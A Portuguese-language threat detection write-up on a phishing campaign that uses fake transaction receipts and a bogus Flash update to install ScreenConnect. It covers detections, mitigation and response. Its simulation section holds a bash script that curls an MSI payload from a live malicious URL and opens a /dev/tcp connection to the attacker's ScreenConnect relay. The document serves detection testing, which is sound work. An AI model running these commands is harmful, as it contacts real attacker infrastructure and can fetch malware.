Malware Phishing/Scam: Emails de Phishing Disfarçados como Recibos de Transações
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Os agentes de ameaça estão enviando e-mails de phishing que se fazem passar por funcionários de empresas dos EUA e incluem anexos disfarçados como recibos de transações. O ataque utiliza um PDF malicioso para atrair os usuários a baixarem uma suposta atualização do Adobe Flash Player que na verdade inicia um VBScript. O script então instala a ferramenta legítima de gerenciamento remoto ScreenConnect para estabelecer acesso remoto persistente para atividades subsequentes.
Investigação
O AhnLab Security Intelligence Center (ASEC) identificou a campanha examinando o conteúdo do e-mail de phishing e o comportamento do PDF anexado. A investigação rastreou a cadeia de execução desde o VBScript malicioso até a recuperação de carga em segundo plano e a instalação silenciosa de um pacote MSI usando curl.exe and msiexec.exe.
Mitigação
Os usuários devem ser treinados para reconhecer tentativas de phishing envolvendo recibos de transações inesperados e solicitações para instalar atualizações de software como o Adobe Flash Player. As organizações devem restringir a execução de VBScripts e monitorar o uso não autorizado de ferramentas de gerenciamento remoto, incluindo o ScreenConnect. A lista de permissões de aplicativos também pode ajudar a prevenir a execução de pacotes MSI desconhecidos ou não aprovados.
Resposta
Se uma atividade maliciosa for detectada, o sistema afetado deve ser isolado imediatamente para evitar o acesso remoto através do ScreenConnect. Os respondedores devem encerrar sessões ativas associadas com relay.Gamedbd.Com infraestrutura e inspecionar o registro para armazenar informações de sessão. Uma investigação forense completa também deve determinar se ocorreu movimentação lateral ou exfiltração de dados através da ferramenta de gerenciamento remoto.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
LOLBAS WScript / CScript (via criação de processo)
Software de Acesso Remoto/ Gestão Alternativo (via criação de processo)
Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via proxy)
Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via dns)
IOCs (HashMd5) para detectar: Malware Phishing/Enganação: E-mails de Phishing Disfarçados como Recibos de Transações
Detecção de E-mails de Phishing Disfarçados como Recibos de Transações [Proxy]
E-mail de Phishing Imitando Recibo de Transação Levando à Instalação de Pacote MSI [Criação de Processo do Windows]
Execução de Simulação
Pré-requisito: O Check do Pré-vôo de Telemetria & Base deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos incorretos.
-
Narrativa & Comandos do Ataque: O adversário inicia uma campanha de phishing enviando um e-mail sobre uma transação falhada. O link direciona a vítima para
https://transaction-sucessful.vercel.app, que hospeda um recibo falso. Quando a vítima clica em “Baixar Recibo”, o navegador tenta buscarhttps://payment-six-eta.vercel.app/doc/sc.msi. Uma vez que a carga é executada, ela tenta estabelecer uma sessão de acesso remoto conectando-se ao relay ScreenConnect emrelay.gamedbd.com:8041. Esta sequência testa tanto a detecção baseada em URL quanto a lógica de detecção baseada em domínio/porta. -
Script de Teste de Regressão:
#!/bin/bash # Script de simulação para acionar a regra de detecção Phishing/ScreenConnect echo "[+] Iniciando Simulação: Teste de Detecção Phishing/ScreenConnect" # 1. Simular o download do MSI malicioso do URL da Vercel echo "[+] Etapa 1: Simulando conexão ao URL malicioso da Vercel..." curl -s -o /dev/null "https://payment-six-eta.vercel.app/doc/sc.msi" # 2. Simular a conexão ao domínio/porta específico do relay ScreenConnect echo "[+] Etapa 2: Simulando conexão ao relay malicioso ScreenConnect..." # Usamos /dev/tcp para simular uma tentativa de conexão sem precisar de um ouvinte real timeout 2 bash -c 'cat < /dev/null > /dev/tcp/relay.gamedbd.com/8041' 2>/dev/null echo "[+] Simulação Completa. Verifique o SIEM para alertas." -
Comandos de Limpeza:
# Nenhum artefato persistente é criado por esta simulação baseada em rede. # Se quaisquer arquivos locais foram baixados, eles devem ser removidos: rm -f sc.msi echo "[+] Limpeza completa."